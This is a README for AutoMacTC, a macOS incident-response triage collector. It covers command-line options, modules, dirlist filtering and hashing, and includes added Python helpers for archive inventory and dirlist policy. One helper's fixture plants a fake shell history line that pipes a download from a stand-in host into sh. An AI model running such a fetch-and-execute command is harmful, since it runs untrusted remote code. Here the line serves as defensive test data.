
AutoMacTC: Automated Mac Forensic Triage Collector

Purpose

This is a modular forensic triage collection framework designed to access various forensic artifacts on macOS, parse them, and present them in formats viable for analysis. The output may provide valuable insights for incident response in a macOS environment. Automactc can be run against a live system or against a dead disk (mounted as a volume on the analysis system).

Requirements

  • Python 3.9 or earlier (backwards compatible with Python 2.7)
  • macOS target systems, for live collection (successfully tested on macOS major releases 10.11 through 11.2.3, as well as on M1 processors)
  • MacOS analysis systems, for triage against a mounted disk image (disk images from macOS 10.11 through 10.15 systems are supported)

Basic usage

At its simplest, you can run automactc with the following invocation.

sudo /usr/bin/python automactc.py -m all

This will run all modules (-m) with default settings, using the version of python that is pre-installed on the macOS device, i.e.

- default input directory will be /, or the root of the current volume
- default output directory will be ./, or the working directory from which automactc is run (NOT the location of the script)
- default prefix for output filenames will be automactc-output
- default behavior is to populate a runtime.log for debugging and info
- default format for individual artifact output files is CSV
- default CPU priority is set to low
- default behavior on completion is to compress all output files to tar.gz

In order to list all available modules and do nothing else, simply run:

automactc.py -l

The inputdir and outputdir can be specified with the -i and -o flags, respectively.

automactc.py -i / -o /automactc_output -m all

For mounted images from macOS 10.15+ systems, the system and data volumes are separate: point -i at the Data volume (e.g. "Macintosh HD - Data") and use the -is flag to specify the system volume (e.g. "Macintosh HD").

Modules can be specified for inclusion or exclusion on a per-module basis. In other words, you can INCLUDE specific modules, such as pslist, bash, and profiler:

automactc.py -m pslist bash profiler

Or, you can exclude specific modules, to run all EXCEPT those specified, such as dirlist and autoruns:

automactc.py -x dirlist autoruns

Output Control

For every module, automactc will generate an output file and populate it with data. The output file format defaults to CSV, but can be toggled to JSON with the -fmt flag. It is not currently possible to specify output format on a per-module basis.

automactc.py -m all -fmt json 

Upon successfully populating the output file with data, the file is rolled into a .tar archive that is generated when automactc completes its first module. Upon completion of the last module, automactc will GZIP the .tar archive to .tar.gz.

The name of the tar archive follows the following naming convention:

prefix,hostname,ip,automactc_runtime.tar

The first field, prefix, can be specified at runtime with -p. If unspecified, the prefix is set to automactc-output. The other fields are populated from data gathered at runtime. This is useful when running automactc on several systems for a single incident.

automactc.py -m all -p granny-smith

While the default behavior is to generate a tarball, use of the -nt flag will prevent the creation of a tar archive and will leave the output files as-is in the output directory.

automactc.py -m all -p granny-smith -nt 
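As an added example that is not part of AutoMacTC, the following Python parses archive names that follow the convention above and inventories the per-module files inside a .tar or .tar.gz, which is the bookkeeping needed when one prefix is used across several hosts in a single incident. It assumes the runtime field is a sortable timestamp string and that each member inside the archive is named prefix,hostname,ip,runtime,<module>.<csv|json> alongside the runtime.log; both are assumptions about the layout, not something this README states.

```python
"""Triage helper for AutoMacTC output archives (added example, not AutoMacTC code).

Parses the README's archive naming convention (prefix,hostname,ip,automactc_runtime.tar,
gzipped to .tar.gz on completion) and inventories the per-module members so archives
from several hosts can be sorted and checked for missing modules before analysis.
Assumed for illustration: the runtime field is a timestamp string and members are named
prefix,hostname,ip,runtime,<module>.<csv|json> next to the runtime.log.
"""
import csv
import io
import json
import re
import tarfile
from collections import defaultdict

ARCHIVE_RE = re.compile(
    r"^(?P<prefix>[^,]+),(?P<hostname>[^,]+),(?P<ip>[^,]+),(?P<runtime>[^,]+)"
    r"\.tar(?P<gz>\.gz)?$"
)


def parse_archive_name(name):
    """Split 'prefix,hostname,ip,runtime.tar[.gz]' into fields; None if not an automactc archive."""
    m = ARCHIVE_RE.match(name)
    if m is None:
        return None
    fields = m.groupdict()
    fields["compressed"] = fields.pop("gz") is not None
    return fields


def group_by_host(archive_names):
    """Group archives from one incident by hostname, oldest run first."""
    hosts = defaultdict(list)
    for name in archive_names:
        fields = parse_archive_name(name)
        if fields is not None:
            hosts[fields["hostname"]].append(fields)
    for runs in hosts.values():
        runs.sort(key=lambda f: f["runtime"])
    return dict(hosts)


def inventory(archive_bytes):
    """Return {module: record_count} for the csv/json members of a tar or tar.gz blob.

    Members are read in memory via extractfile(); never extractall() an archive
    collected from a possibly compromised host without checking member paths first.
    """
    counts = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            stem, _, ext = member.name.rpartition(".")
            module = stem.rsplit(",", 1)[-1]  # assumed layout: module is the last field
            if ext not in ("csv", "json"):
                continue  # e.g. the runtime.log member
            body = tar.extractfile(member).read().decode("utf-8")
            if ext == "csv":
                counts[module] = sum(1 for _ in csv.DictReader(io.StringIO(body)))
            else:
                try:  # one JSON document (object or list) ...
                    doc = json.loads(body)
                    counts[module] = len(doc) if isinstance(doc, list) else 1
                except ValueError:  # ... or newline-delimited JSON objects
                    counts[module] = sum(1 for ln in body.splitlines() if ln.strip())
    return counts


def missing_modules(counts, expected):
    """Modules that were requested but produced no output file (check runtime.log for why)."""
    return sorted(m for m in expected if m not in counts)


def build_sample_archive(prefix="automactc-output", hostname="mac01.local",
                         ip="10.0.0.5", runtime="2021-03-01T10.00.00"):
    """Constructed stand-in for a real run: two CSV modules, one JSON module and the log."""
    base = ",".join([prefix, hostname, ip, runtime])
    members = {
        base + ",pslist.csv": "pid,ppid,name\n1,0,launchd\n512,1,Terminal\n",
        base + ",netstat.csv": "proto,local,remote\ntcp4,10.0.0.5:52000,203.0.113.9:443\n",
        base + ",systeminfo.json": json.dumps({"hostname": hostname, "ip": ip}),
        base + ".log": "INFO starting pslist\nINFO starting netstat\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, text in members.items():
            data = text.encode("utf-8")
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return base + ".tar.gz", buf.getvalue()


if __name__ == "__main__":
    name, blob = build_sample_archive()
    print(parse_archive_name(name))
    counts = inventory(blob)
    print(counts, "missing:", missing_modules(counts, ["pslist", "netstat", "systeminfo", "quarantines"]))
```

Running the module builds the constructed archive, reports two pslist rows, one netstat row and one systeminfo record, and flags quarantines as missing; feed group_by_host() the file names from a collection share to see which hosts have been triaged and how many times.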

Current Modules

- pslist (current process list at time of automactc run)
- lsof (current file handles open at time of automactc run)
- netstat (current network connections at time of automactc run)
- unifiedlogs (collect Unified Logging events from a live system based on specified predicates)
- asl (parsed Apple System Log (.asl) files)
- auditlog (parsing audit log files from private/var/audit/)
- autoruns (parsing of various persistence locations and plists)
- bash (parsing bash/.*_history files for all users)
- chrome (parsing chrome visit history and download history)
- cookies (parsing the cookies database for each user for chrome and firefox)
- coreanalytics (parsing program execution evidence produced by Apple diagnostics)
- dirlist (list of files and directories across the disk)
- eventtaps (parsing event tap items)
- firefox (parsing firefox visit history and download history)
- installhistory (parsing program installation history)
- mru (parsing SFL and MRU plist files)
- netconfig (parsing airport and network interface settings)
- quarantines (parsing QuarantineEventsV2 database)
- quicklook (parsing Quicklooks database)
- safari (parsing safari visit history and download history)
- spotlight (parsing user spotlight top searches)
- ssh (parsing known_hosts and authorized_keys files for each user)
- syslog (parsing system.log files)
- systeminfo (basic system identification, such as current IP address, serial no, hostname)
- terminalstate (decode and parse savedState files for the Terminal application for each user)
- users (listing present and deleted users on the system)
- utmpx (listing user sessions on terminals)

Advanced usage

One can utilize the --rtr flag to reduce verbosity of some modules to display nicely on CrowdStrike RTR console. Specifically the real time updates of the dirlist module are reduced in order to not overflow the console window.

automactc.py -m all --rtr

AutoMacTC can be deployed and executed with the provided sample bash wrapper deploy.sh. The provided wrapper will

  • execute AutoMacTC with the version of python installed at /usr/bin/python
  • use the --rtr flag to reduce verbosity when running remotely via a terminal
  • use the --prefix 'automactc-output'
  • output in json format
  • exclude the live modules that are not supported on 10.14/10.15+: quicklook, coreanalytics, and safari

To use the wrapper script:

  • Compress the automactc folder into a tar.gz archive

  • Copy the archive and the wrapper script to the host system into their own folder (or a location such as /private/tmp or /tmp)

  • Run the wrapper with sudo

    sudo bash deploy.sh

By default, automactc populates verbose debug logging into a file named prefix,hostname,ip,runtime.log. You can disable the generation of this log with:

automactc.py -m all -nl

By default, automactc will print the INFO and ERROR log messages to the console. To run automactc in quiet mode and write NO messages to the console, use -q. INFO messages include program startup messages, one message per module start, and completion/cleanup messages.

automactc.py -m all -q

To print DEBUG messages to the console along with INFO and ERROR messages, use the -d flag.

automactc.py -m all -d

Automactc runs with the lowest CPU priority (highest niceness) possible by default. It is possible to disable this and run at a normal priority with the -np flag (see the help menu below; -r is the RTR verbosity flag described above, not the priority flag).

automactc.py -m all -np

Automactc can also be run against a dead disk, if the disk is mounted as a volume on the analysis system. Once mounted, run automactc with the appropriate inputdir (pointing to the Volume mount point) and -f to toggle forensic mode ON.

NOTE: for a live system, if you wish to collect dirlist on mounted peripheral devices, you can use -f with -i /, else dirlist will not recurse further into mounted /Volumes.

automactc.py -i /Volumes/mounted_IMAGE/ -o /path/to/output -f -m all

Dirlist Arguments

Directory Inclusion/Exclusion

It is possible to limit dirlist recursion to specific directories with the -K flag. By default, dirlist will attempt to recurse from the root of the inputdir volume unless otherwise specified with this flag. Multiple directories can be specified in a space separated list.

automactc.py -m dirlist -K /Users/ /Applications/ /tmp 

It is also possible to exclude specific directories from dirlist recursion with the -E flag.

automactc.py -m dirlist -E /path/to/KnownDevDirectory

By default, the following directories and files are excluded on live systems:

/.fseventsd (to reduce output verbosity)
/.DocumentRevisions-V100 (to reduce output verbosity)
/.Spotlight-V100 (to reduce output verbosity)
/Users/*/Pictures (to avoid permissions errors)
/Users/*/Library/Application Support/AddressBook (to avoid permissions errors)
/Users/*/Calendar (to avoid permissions errors)
/Users/*/Library/Calendars (to avoid permissions errors)
/Users/*/Library/Preferences/com.apple.AddressBook.plist (to avoid permissions errors)
/System/Volumes/Data/private/var/folders/kb/* (to reduce output verbosity)
/System/Volumes/Data/private/var/folders/zz/* (to reduce output verbosity)

By default, the following directories are excluded when running forensic mode against a mounted image:

/.fseventsd (to reduce output verbosity)
/.DocumentRevisions-V100 (to reduce output verbosity)
/.Spotlight-V100 (to reduce output verbosity)

Any additional directories to exclude will be appended to this default list, unless you provide the -E no-defaults argument first, in which case only your specified directories will be excluded.

automactc.py -m dirlist -E no-defaults /path/to/KnownDevDirectory

Hashing

The hashing arguments below can be used for BOTH dirlist and the autoruns modules.

By default, the dirlist module will hash files only with the sha256 algorithm. If you wish to use both the SHA256 and MD5 algorithms, use -H sha256 md5. If you wish to use only md5, use -H md5. If you wish to use neither, use -H none. NOTE: If you run the dirlist module against a dead disk with hashing enabled, this currently takes a LONG time to run.

automactc.py -m dirlist -H sha256 md5

By default, the dirlist module will only hash files with sizes under 10mb. To override this setting and hash files under a different size threshold, the threshold can be changed with the -S flag in number of megabytes. NOTE: increasing the size threshold will likely increase the amount of time it takes to run the dirlist module. For example, to hash files up to 15MB:

automactc.py -m dirlist -S 15

Bundles, Signatures, Multithreading

By default, the dirlist module will NOT recurse into bundle directories, including the following:

'.app', '.framework','.lproj','.plugin','.kext','.osax','.bundle','.driver','.wdgt','.Office','.blacklight'

To override this setting, use the -R flag. NOTE: this produces a far higher volume of output and takes significantly more time. These bundle directories will be configurable in a future update.
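As an added example that is not AutoMacTC's own code, the following Python models the dirlist policy described in the Directory Inclusion/Exclusion, Hashing and Bundles sections above: how -E entries combine with the default exclusion list (including the no-defaults override), how -H and -S decide which files get hashed and with which algorithms, how -K restricts the walk to chosen roots, and how bundle directories are listed but not entered unless -R is given. The default exclusion list is the live-system list from this README; the function names, the record layout and the constructed sample volume are assumptions made for illustration.

```python
"""Model of the dirlist collection policy (added example, not AutoMacTC's own code).
Reproduces the -K, -E/no-defaults, -H, -S and -R semantics from the README; the default
exclusions are the README's live-system list, everything else is illustrative."""
import fnmatch
import hashlib
import os
import tempfile

DEFAULT_LIVE_EXCLUDES = [
    "/.fseventsd", "/.DocumentRevisions-V100", "/.Spotlight-V100",
    "/Users/*/Pictures", "/Users/*/Library/Application Support/AddressBook",
    "/Users/*/Calendar", "/Users/*/Library/Calendars",
    "/Users/*/Library/Preferences/com.apple.AddressBook.plist",
    "/System/Volumes/Data/private/var/folders/kb/*",
    "/System/Volumes/Data/private/var/folders/zz/*",
]
BUNDLE_SUFFIXES = (".app", ".framework", ".lproj", ".plugin", ".kext", ".osax",
                   ".bundle", ".driver", ".wdgt", ".Office", ".blacklight")
SUPPORTED_HASHES = {"sha256", "md5"}

def resolve_excludes(exclude_args, defaults=DEFAULT_LIVE_EXCLUDES):
    """-E: user patterns are appended to the defaults unless the first item is 'no-defaults'."""
    args = list(exclude_args or [])
    return args[1:] if args and args[0] == "no-defaults" else list(defaults) + args

def resolve_hash_algs(hash_args):
    """-H: defaults to sha256; 'none' disables hashing; only sha256/md5 are accepted."""
    algs = list(hash_args) if hash_args else ["sha256"]
    if algs == ["none"]:
        return []
    if set(algs) - SUPPORTED_HASHES:
        raise ValueError("unsupported hash algorithm(s): %r" % sorted(set(algs) - SUPPORTED_HASHES))
    return algs

def is_excluded(vol_path, excludes):
    """True if the path or one of its ancestors matches a pattern; '*' matches one path component."""
    parts = [s for s in vol_path.split("/") if s]
    for pat in excludes:
        segs = [s for s in pat.split("/") if s]
        if len(segs) <= len(parts) and all(fnmatch.fnmatchcase(a, b) for a, b in zip(parts, segs)):
            return True
    return False

def dirlist(inputdir, include_dirs=None, exclude_args=None, hash_args=None,
            hash_size_limit_mb=10, recurse_bundles=False):
    """Walk inputdir as dirlist does (-K roots, -E, -H, -S in MB, -R); returns {volume_path: record}."""
    excludes = resolve_excludes(exclude_args)
    algs = resolve_hash_algs(hash_args)
    limit = hash_size_limit_mb * 1024 * 1024
    records = {}
    for root in include_dirs or ["/"]:
        for dirpath, dirnames, filenames in os.walk(os.path.join(inputdir, root.strip("/"))):
            rel = os.path.relpath(dirpath, inputdir)
            vol_dir = "/" if rel == "." else "/" + rel.replace(os.sep, "/")
            keep = []
            for d in sorted(dirnames):
                vp = vol_dir.rstrip("/") + "/" + d
                if is_excluded(vp, excludes):
                    continue
                if d.endswith(BUNDLE_SUFFIXES) and not recurse_bundles:
                    records[vp] = {"type": "bundle"}  # listed, but not entered without -R
                    continue
                records[vp] = {"type": "dir"}
                keep.append(d)
            dirnames[:] = keep  # os.walk honours in-place pruning of dirnames
            for f in filenames:
                vp = vol_dir.rstrip("/") + "/" + f
                if is_excluded(vp, excludes):
                    continue
                full = os.path.join(dirpath, f)
                st = os.lstat(full)  # lstat: never follow symlinks on a suspect volume
                rec = {"type": "file", "size": st.st_size}
                if algs and st.st_size < limit and not os.path.islink(full):
                    with open(full, "rb") as fh:  # under the -S limit, so reading whole is fine
                        data = fh.read()
                    for alg in algs:
                        rec[alg] = hashlib.new(alg, data).hexdigest()
                records[vp] = rec
    return records

def build_sample_volume():
    """Constructed fixture standing in for a mounted volume (not real artefacts)."""
    base = tempfile.mkdtemp(prefix="automactc_demo_")
    sample = {
        "Users/alice/.bash_history": b"ls -la\ncurl http://example.invalid/x | sh\n",
        "Users/alice/Pictures/cat.jpg": b"\xff\xd8\xff",  # default-excluded
        "Applications/Evil.app/Contents/MacOS/Evil": b"#!/bin/sh\n",  # inside a bundle
        "private/tmp/big.bin": b"\x00" * (2 * 1024 * 1024),  # 2 MB: above a 1 MB -S
        ".fseventsd/0000000001": b"",  # default-excluded
    }
    for rel, data in sample.items():
        full = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return base
```

Calling dirlist(build_sample_volume(), hash_args=["sha256", "md5"], hash_size_limit_mb=1) lists .bash_history with both digests, records Evil.app as a bundle without its contents, omits the Pictures and .fseventsd trees, and records big.bin without a hash because it is over the 1 MB threshold; passing exclude_args=["no-defaults", "/private"] instead brings Pictures back and drops /private, and include_dirs=["/Applications"] with recurse_bundles=True walks into the bundle the way -K and -R would.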

By default, the dirlist module will check code signatures for all .app, .kext, and .osax files found. To prevent the dirlist module from checking any code signatures, use the -NC flag. This argument can be used for BOTH the dirlist and autoruns modules.

automactc.py -m dirlist -NC

By default, the dirlist module runs multithreaded to increase processing speed. Multithreading can be disabled with the -NM flag.

automactc.py -m dirlist -NM

Unified Logs Live module

By default, to reduce verbosity and time taken, only a subset of the available sample predicates is enabled. You can optionally enable additional predicates by removing the comment character from existing predicates or by adding your own custom predicates.

The sample set of predicates was obtained from https://www.crowdstrike.com/blog/how-to-leverage-apple-unified-log-for-incident-response/.

Help Menu

usage: automactc.py [-m INCLUDE_MODULES [INCLUDE_MODULES ...] | -x
                    EXCLUDE_MODULES [EXCLUDE_MODULES ...] | -l] [-h] [-v]
                    [-i INPUTDIR] [-is INPUTSYSDIR] [-o OUTPUTDIR] [-p PREFIX]
                    [-f] [-nt] [-nl] [-fmt {csv,json}] [-np] [-b] [-O]
                    [-q | -r | -d]
                    [-K DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...]]
                    [-E DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...]]
                    [-H DIR_HASH_ALG [DIR_HASH_ALG ...]]
                    [-S DIR_HASH_SIZE_LIMIT] [-R] [-NC] [-NM]

AutoMacTC: an Automated macOS forensic triage collection framework.

module filter:
  -m INCLUDE_MODULES [INCLUDE_MODULES ...], --include_modules INCLUDE_MODULES [INCLUDE_MODULES ...]
                        module(s) to use, use "all" to run all modules, space
                        separated list only
  -x EXCLUDE_MODULES [EXCLUDE_MODULES ...], --exclude_modules EXCLUDE_MODULES [EXCLUDE_MODULES ...]
                        assumes you want to run all modules EXCEPT those
                        specified here, space separated list only
  -l, --list_modules    if flag is provided, will list available modules and
                        exit.

general arguments:
  -h, --help            show this help message and exit
  -v, --verbose         enable verbose logging
  -i INPUTDIR, --inputdir INPUTDIR
                        input directory; mount dmg with mountdmg.sh script and
                        use -f to analyze mounted HFS or APFS Volume, use
                        volume appended with "Data" (e.g. "Macintosh HD -
                        Data") for 10.15+ systems
  -is INPUTSYSDIR, --inputsysdir INPUTSYSDIR
                        input system drive if using mounted drive from 10.15+
                        system (e.g. "Macintosh HD")
  -o OUTPUTDIR, --outputdir OUTPUTDIR
                        output directory
  -p PREFIX, --prefix PREFIX
                        prefix to append to tarball and/or output files
  -f, --forensic_mode   if flag is provided, will analyze mounted volume
                        provided as inputdir
  -nt, --no_tarball     if flag is provided, will NOT package output files
                        into tarball
  -nl, --no_logfile     if flag is provided, will NOT generate logfile on disk
  -fmt {csv,json}, --output_format {csv,json}
                        toggle between csv and json output, defaults to csv
  -np, --no_low_priority
                        if flag is provided, will NOT run automactc with
                        highest niceness (lowest CPU priority). high niceness
                        is default
  -b, --multiprocessing
                        if flag is provided, WILL multiprocess modules
                        [WARNING: Experimental!]
  -O, --override_mount  if flag is provided, WILL bypass error where inputdir
                        does not contain expected subdirs

console logging verbosity:
  -q, --quiet           if flag is provided, will NOT output to console at all
  -r, --rtr             reduce verbosity to display nicely on RTR console
  -d, --debug           enable debug logging to console

specific module arguments:
  -K DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...], --dir_include_dirs DIR_INCLUDE_DIRS [DIR_INCLUDE_DIRS ...]
                        directory inclusion filter for dirlist module,
                        defaults to volume root, space separated list only
  -E DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...], --dir_exclude_dirs DIR_EXCLUDE_DIRS [DIR_EXCLUDE_DIRS ...]
                        directory and file exclusion filter for dirlist
                        module. defaults are specified in README. space
                        separated list only. put 'no-defaults' as first item
                        to overwrite default exclusions and then provide your
                        own exclusions
  -H DIR_HASH_ALG [DIR_HASH_ALG ...], --dir_hash_alg DIR_HASH_ALG [DIR_HASH_ALG ...]
                        either sha256 or md5 or both or none, at least one is
                        recommended, defaults to sha256. also applies to
                        autoruns module
  -S DIR_HASH_SIZE_LIMIT, --dir_hash_size_limit DIR_HASH_SIZE_LIMIT
                        file size filter for which files to hash, in
                        megabytes, defaults to 10MB. also applies to autoruns
                        module
  -R, --dir_recurse_bundles
                        will fully recurse app bundles if flag is provided.
                        this takes much more time and space
  -NC, --dir_no_code_signatures
                        if flag is provided, will NOT check code signatures
                        for app and kext files. also applies to autoruns
                        module
  -NM, --dir_no_multithreading
                        if flag is provided, will NOT multithread the dirlist
                        module
